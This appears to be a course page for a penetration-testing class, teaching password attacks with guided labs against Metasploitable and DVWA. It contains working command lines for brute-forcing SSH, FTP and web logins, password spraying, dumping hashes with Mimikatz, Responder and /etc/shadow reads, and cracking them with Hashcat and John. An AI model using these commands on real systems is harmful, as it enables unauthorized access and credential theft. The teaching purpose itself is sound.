Practice credential attacks before moving to reading resources.

Opening Framing: Why Passwords Matter

Despite decades of security advances, passwords remain the dominant authentication method. And despite decades of warnings, people still choose weak passwords, reuse them across sites, and store them insecurely.

For penetration testers, password attacks are often the path of least resistance. A cracked password can provide legitimate access that bypasses technical controls entirely. One reused password can compromise an entire organization.

This week covers password attack methodologies: online attacks against live services, offline cracking of captured hashes, and the tools and techniques that make password attacks effective.

Key insight: The best technical security can be undone by a sticky note with "Password123!" written on it.

1) Password Attack Types

Understanding different attack approaches:

Online Attacks:
- Attack live authentication services
- Limited by network speed and lockouts
- Detectable by defenders
- Examples: SSH, FTP, web logins

Offline Attacks:
- Attack captured password hashes
- Limited only by computing power
- Undetectable (already have hashes)
- Much faster than online

Password Spraying:
- Few passwords against many accounts
- Avoids lockouts
- Effective against large organizations
- Uses common passwords

Attack Strategies:

Brute Force:
- Try every possible combination
- Guaranteed to work eventually
- Very slow for complex passwords
- aaa, aab, aac... zzz

Dictionary Attack:
- Try words from wordlist
- Much faster than brute force
- Depends on wordlist quality
- password, 123456, qwerty...

Hybrid Attack:
- Dictionary + modifications
- Adds numbers, symbols, case changes
- password → Password1, p@ssword, password123

Rule-Based Attack:
- Apply transformation rules
- Capitalize first letter
- Add year to end
- Substitute letters (a→@, e→3)
- password → P@ssw0rd2024

Common Password Patterns:

People are predictable:

Patterns to exploit:
- Company name + numbers (Acme2024)
- Season + year (Summer2024!)
- Keyboard patterns (qwerty, 123456)
- Sports teams + numbers
- Names + birthdays
- Simple substitutions (p@ssw0rd)

Password policies create patterns:
- 8 chars minimum → exactly 8 chars
- Uppercase required → first letter capital
- Number required → number at end
- Symbol required → ! at end

Result: Password1! (meets policy, easily cracked)

Key insight: Understanding human psychology is as important as understanding cracking tools. People follow patterns.

2) Online Password Attacks

Attacking live authentication services:

Hydra - Fast Online Cracker:

# Basic syntax
hydra -l username -P wordlist.txt [service]://[target]

# SSH attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# FTP attack
hydra -l admin -P passwords.txt ftp://192.168.1.100

# HTTP Basic Auth
hydra -l admin -P passwords.txt http-get://192.168.1.100/admin

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid password"

# Multiple users
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# Rate limiting
hydra -l admin -P passwords.txt -t 4 ssh://192.168.1.100

Medusa - Another Online Tool:

# Medusa syntax
medusa -h [target] -u [user] -P [wordlist] -M [module]

# SSH
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# FTP
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp

# SMB
medusa -h 192.168.1.100 -u admin -P passwords.txt -M smbnt

# Multiple hosts
medusa -H hosts.txt -u admin -P passwords.txt -M ssh

CrackMapExec - Network Swiss Army Knife:

# SMB password spraying
crackmapexec smb 192.168.1.0/24 -u admin -p passwords.txt

# With user list
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!'

# Check for password reuse
crackmapexec smb 192.168.1.0/24 -u admin -p 'FoundPassword1'

# WinRM
crackmapexec winrm 192.168.1.100 -u admin -p passwords.txt

# SSH
crackmapexec ssh 192.168.1.100 -u admin -p passwords.txt

Password Spraying:

# Spray one password against many users

# Why spray?
# - Avoids account lockouts
# - Effective against organizations
# - Uses most common passwords

# Get user list first:
# - LinkedIn research
# - Email format discovery
# - LDAP enumeration

# Common spray passwords:
Season + Year: Summer2024!, Winter2023!
Company + numbers: AcmeCorp1, Acme2024!
Default patterns: Welcome1!, Password123!

# Spray with crackmapexec
crackmapexec smb 192.168.1.100 -u users.txt -p 'Summer2024!' --continue-on-success

# Wait between attempts to avoid detection
# Some tools have built-in delays

Key insight: Online attacks are slow and detectable. Use them surgically with good wordlists, not massive brute force.

3) Password Hash Fundamentals

Understanding hashes is essential for offline attacks:

What is a Hash?

Hashing:
- One-way mathematical function
- Same input = same output (deterministic)
- Cannot reverse to get original
- "password" → "5f4dcc3b5aa765d61d8327deb882cf99"

Hashes are NOT encryption:
- Encryption is reversible (with key)
- Hashing is one-way
- You crack hashes by guessing inputs

Common Hash Types:

MD5 (insecure, fast):
- 32 hex characters
- Example: 5f4dcc3b5aa765d61d8327deb882cf99
- Very fast to crack

SHA-1 (insecure):
- 40 hex characters
- Example: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

SHA-256:
- 64 hex characters
- Still fast to crack without salt

NTLM (Windows):
- 32 hex characters
- Example: 32ed87bdb5fdc5e9cba88547376818d4
- Very fast to crack

NetNTLMv2 (Windows network):
- Captured from network
- Slower to crack
- Format: user::domain:challenge:response

bcrypt (strong):
- Starts with $2a$, $2b$, or $2y$
- Has built-in salt
- Slow by design

Linux shadow (SHA-512):
- Starts with $6$
- Format: $6$salt$hash
- Reasonably slow

Identifying Hash Types:

# By length and format:

32 chars, hex only     → MD5 or NTLM
40 chars, hex only     → SHA-1
64 chars, hex only     → SHA-256
$1$...                 → MD5crypt (Linux)
$5$...                 → SHA-256crypt (Linux)
$6$...                 → SHA-512crypt (Linux)
$2a$..., $2b$...$2y$  → bcrypt
$y$..., $7$...        → yescrypt

# Tools to identify:
hashid 'hash_here'
hash-identifier
hashcat --show -m 0 hash.txt  # will error with suggestion

# Online:
https://hashes.com/en/tools/hash_identifier

Key insight: Fast hashes (MD5, NTLM) crack in seconds. Slow hashes (bcrypt) can take years. Hash type matters enormously.

4) Offline Password Cracking

Cracking captured hashes with powerful tools:

John the Ripper:

# John the Ripper - versatile cracker

# Basic usage (auto-detect hash type)
john hashes.txt

# Specify wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Specify hash format
john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Use rules for mutations
john --wordlist=rockyou.txt --rules hashes.txt

# Common formats:
--format=raw-md5
--format=raw-sha1
--format=nt          # NTLM
--format=sha512crypt # Linux shadow

# Crack Linux shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=rockyou.txt unshadowed.txt

Hashcat - GPU-Powered Cracking:

# Hashcat - fastest cracker (uses GPU)

# Basic syntax
hashcat -m [mode] -a [attack] hashes.txt wordlist.txt

# Common modes (-m):
0     = MD5
100   = SHA1
1000  = NTLM
1800  = SHA-512 (Unix)
3200  = bcrypt
5600  = NetNTLMv2

# Attack modes (-a):
0 = Dictionary
1 = Combination
3 = Brute force/mask
6 = Dictionary + mask
7 = Mask + dictionary

# Dictionary attack
hashcat -m 0 -a 0 hashes.txt rockyou.txt

# With rules
hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule

# Brute force with mask
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a

# Mask charsets:
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = symbols
?a = all printable

# Example: 8 chars, starts with capital, ends with 2 digits
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?d?d

# Show cracked
hashcat -m 1000 hashes.txt --show

Cracking Strategies:

# Progressive approach:

1. Try common passwords first
   hashcat -m 1000 hashes.txt top1000.txt

2. Try full rockyou
   hashcat -m 1000 hashes.txt rockyou.txt

3. Add rules
   hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule

4. Try targeted wordlist
   # Create list with company name, sports teams, etc.
   hashcat -m 1000 hashes.txt custom.txt -r best64.rule

5. Mask attacks for remaining
   hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d?s

# Custom wordlist creation:
# Use CeWL to scrape target website
cewl https://target.com -d 2 -m 5 -w custom_words.txt

# Combine with rules for mutations

Key insight: Hashcat with GPU is orders of magnitude faster than CPU-based cracking. NTLM hashes crack at billions/second.

5) Obtaining Password Hashes

Before cracking, you need hashes:

Windows Hash Extraction:

# From compromised Windows system

# Mimikatz (most common)
mimikatz.exe
> privilege::debug
> sekurlsa::logonpasswords
> lsadump::sam

# Meterpreter
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all

# Secretsdump (remote with creds)
secretsdump.py domain/user:password@target

# SAM database (offline)
# Copy SAM and SYSTEM from:
# C:\Windows\System32\config\SAM
# C:\Windows\System32\config\SYSTEM
# Extract:
samdump2 SYSTEM SAM

Linux Hash Extraction:

# Linux stores hashes in /etc/shadow

# Need root access to read
cat /etc/shadow

# Format:
username:$6$salt$hash:last:min:max:warn:inactive:expire

# Unshadow for John
unshadow /etc/passwd /etc/shadow > unshadowed.txt

# Or extract just hashes
cat /etc/shadow | grep -v '!' | cut -d: -f1,2

Network Hash Capture:

# Capture NetNTLMv2 hashes from network

# Responder - poison LLMNR/NBT-NS
sudo responder -I eth0 -wrf

# When victim browses \\attacker or similar:
# Captures NetNTLMv2 hashes

# Crack captured hash:
hashcat -m 5600 captured_hash.txt rockyou.txt

# NTLM relay (use hash without cracking)
ntlmrelayx.py -t smb://target -smb2support

Database Credentials:

# From SQL injection

# MySQL
SELECT user,password FROM mysql.user;

# PostgreSQL
SELECT usename,passwd FROM pg_shadow;

# MSSQL
SELECT name,password_hash FROM sys.sql_logins;

# Web application databases
# Often MD5 or bcrypt hashed
SELECT username,password FROM users;

Key insight: Hash extraction often requires elevated privileges. But once you have hashes, cracking is undetectable.

Real-World Context: Password Attacks in Practice

Professional considerations for password attacks:

Account Lockouts: Online attacks can lock out users, causing disruption. Always check lockout policies and coordinate with the client. Password spraying minimizes this risk.

Scope Considerations: Cracked passwords may grant access to systems outside your scope. Stop and report when you find credentials that could cross boundaries.

Credential Reuse: Found passwords should be tested against other services (within scope). Credential reuse is extremely common and often leads to broader compromise.

MITRE ATT&CK Mapping:

• T1110 - Brute Force: Online password attacks
• T1003 - OS Credential Dumping: Hash extraction
• T1558 - Steal or Forge Kerberos Tickets: Windows auth attacks

Key insight: A single cracked password often leads to complete domain compromise through credential reuse and lateral movement.

Guided Lab: Password Attack Practice

Practice password attacks against Metasploitable.

Step 1: Online Attack - SSH

# Create small wordlist for testing
echo -e "admin\npassword\nmsfadmin\nroot\n123456" > passwords.txt

# Attack SSH with Hydra
hydra -l msfadmin -P passwords.txt ssh://[metasploitable-ip]

# Try with user list
echo -e "msfadmin\nroot\nuser" > users.txt
hydra -L users.txt -P passwords.txt ssh://[metasploitable-ip]

Step 2: Online Attack - FTP

# Attack FTP
hydra -l msfadmin -P passwords.txt ftp://[metasploitable-ip]

# Check anonymous access too
ftp [metasploitable-ip]
> USER anonymous
> PASS test@test.com

Step 3: Extract and Crack Hashes

# After getting shell access:
cat /etc/shadow

# Copy the hashes to Kali
# Create file with shadow entries

# Crack with John
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

# Show results
john --show unshadowed.txt

Step 4: Web Application Brute Force

# Attack DVWA login with Hydra
# First, examine the login form

hydra -l admin -P passwords.txt [metasploitable-ip] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

Reflection (mandatory)

1. How long did online attacks take vs. offline cracking?
2. What would prevent these attacks in a real environment?
3. How would password spraying differ from what you did?
4. What weak passwords did you find, and why are they common?

Week 7 Outcome Check

By the end of this week, you should be able to:

• Understand different password attack types
• Perform online attacks with Hydra and similar tools
• Identify common hash types
• Crack hashes with John the Ripper and Hashcat
• Extract password hashes from systems
• Apply password spraying techniques

Next week: Post-Exploitation—what to do after you're in.

🎯 Hands-On Labs (Free & Essential)

Practice credential attacks before moving to reading resources.

💡 Lab Tip: Start with small wordlists and add rules only after quick wins.

🛡️ Padding Oracles & Crypto Side-Channels

Some crypto failures aren't about weak keys, but about how systems respond to invalid input. Those responses leak secrets.

Side-channel indicators:
- Different error messages or timings
- Observable response size changes
- Repeated retries without lockout
- Improper MAC-then-encrypt patterns

📚 Building on CSY101 Week-13: Threat model error handling as an attack surface.

Resources

Complete the required resources to build your foundation.

• Hashcat Wiki · 45-60 min · 50 XP · Resource ID: csy202_w7_r1 (Required)
• John the Ripper Documentation · 45-60 min · 50 XP · Resource ID: csy202_w7_r2 (Required)
• SecLists Password Lists · Reference · 25 XP · Resource ID: csy202_w7_r3 (Optional)

Lab: Comprehensive Password Attack

Goal: Compromise accounts through multiple password attack vectors.

Part 1: Reconnaissance

1. Identify all authentication services on Metasploitable
2. Note which support password authentication
3. Check for default credentials

Part 2: Online Attacks

1. Attack at least 3 different services:
   • SSH
   • FTP
   • Telnet
   • Web applications
2. Document successful credentials
3. Note attack duration and detection potential

Part 3: Hash Extraction and Cracking

1. Use gained access to extract hashes
2. Identify hash types
3. Crack using multiple approaches:
   • Dictionary attack
   • With rules
   • Custom wordlist

Part 4: Credential Reuse

1. Test cracked passwords against other services
2. Document any credential reuse found
3. Map access gained from password attacks

Deliverable (submit):

• List of attacked services
• Cracked credentials with method used
• Credential reuse findings
• Attack timeline and detection considerations
• Recommendations for password security

Checkpoint Questions

1. What is the difference between online and offline password attacks?
2. What is password spraying and why is it effective?
3. How do you identify a hash type?
4. What makes Hashcat faster than John the Ripper?
5. Where are password hashes stored on Linux and Windows?
6. Why are NTLM hashes easier to crack than bcrypt?

Week 07 Quiz

Test your understanding of password attack types, tools, and hashing defenses.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Weekly Reflection

Reflection Prompt (200-300 words):

This week you learned password attacks—exploiting the weakest link in most security chains. You cracked hashes and attacked authentication services.

Reflect on these questions:

• People have been warned about weak passwords for decades. Why do you think the problem persists?
• Password cracking hardware keeps getting faster. What does this mean for password security long-term?
• How would you explain the risks of password reuse to a non-technical user?
• What alternatives to passwords might be more secure? What are their tradeoffs?

A strong reflection will consider both technical and human factors in password security.

Verified Resources & Videos

• Wordlists: SecLists Collection
• Hash Lookup: Hashes.com
• Custom Wordlists: CeWL - Custom Word List Generator

Password attacks are often the fastest path to compromise. The skills you've learned—online attacks, hash cracking, credential reuse testing—are fundamental to penetration testing. Next week: what to do after you've gained initial access.